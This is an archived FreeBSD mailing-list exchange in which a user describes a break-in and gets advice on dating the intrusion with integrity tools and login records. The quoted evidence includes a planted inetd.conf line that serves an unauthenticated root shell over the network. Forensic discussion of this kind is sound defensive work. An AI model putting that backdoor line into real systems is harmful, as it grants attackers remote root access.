Re: I got hacked, I think

From: jslivko@4evermail.com
Date: 10/18/01


From: jslivko@4evermail.com <jslivko@4evermail.com>
To: <tomek@mpionline.com>
Date: Thu, 18 Oct 2001 16:31:37 +0000


[CC'd to -security, as this should be discussed there]

Did you have any system snoopers around that you installed (tripwire
and things of that ilk) that you can refer to for time information?
If you can narrow down the time that the files were updated, you
might have found out when the intrusion actually occurred and then,
by grepping that information from "last", you can find out who he
logged in as (assuming he logged in normally the first time). If I
can be of any help, feel free to shoot me an e-mail. -- Jonathan

--- "Tomek" <tomek@mpionline.com> wrote:
> I found out more info.
>
> -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf
> -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo-
1.6.3.7_1.tgz
> -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf
>
> Checking the bizarre /inetd.conf is shocking:
> eklogin stream tcp nowait root /bin/sh sh -i
>
> I take it that "sh" would not even request a login or anything if
called
> directly from inetd.conf, would it? I am sitting here, he is STILL
> pinging me and watching the system (even tried to ftp again a few
> minutes ago), and for the life of me I can't figure out where it all
> began... who did he even login in the first time, maybe it was some
> buffer overflow or something.... yuck.
>
> TY for all your help guys, you are all wonderful! I will leave you
in
> peace now (I hope). I still dont know about Broot though...
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message



Relevant Pages

  • Re: OS X System freeze
    ... inception, on several different Macs with several different utilizations, and just now I had to hard restart my computer for the first time because my iBook became totally unresponsive after waking from sleep. ... I recall once the screen saver was wedged, though on one occasion I had to kill my login process, which reset the box back to the login screen. ... You probably don't have to immediately hit the Big Grey Switch when the UI appears wedged. ...
    (comp.sys.mac.system)
  • Re: Metalink Updates
    ... The phrase "You will be prompted to change this password the first time ... you login" appears on a new line in my email. ... While following forum threads via the NEXT button I was place on the ... There is no ETA on having a the problem fixed from Oracle support per a ...
    (comp.databases.oracle.server)
  • Re: Error dialog on login
    ... "Rock" wrote: ... >> I am getting a popup the first time I login after a reboot of XP Pro SP2: ...
    (microsoft.public.windowsxp.general)
  • [opensuse] CompizFusion disable
    ... How do I just disable the loading of compiz and emerald at login? ... (I remember the first time I tried compiz and beryl I had to figure out ... how to create startup scripts to get it to load at login, ...
    (SuSE)
  • Re: slow login to new windows server 2003 domain
    ... > Server 2003 domain from a client XP workstation. ... > around 10 minutes to login for the first time. ... After the first login, I ...
    (microsoft.public.windows.server.general)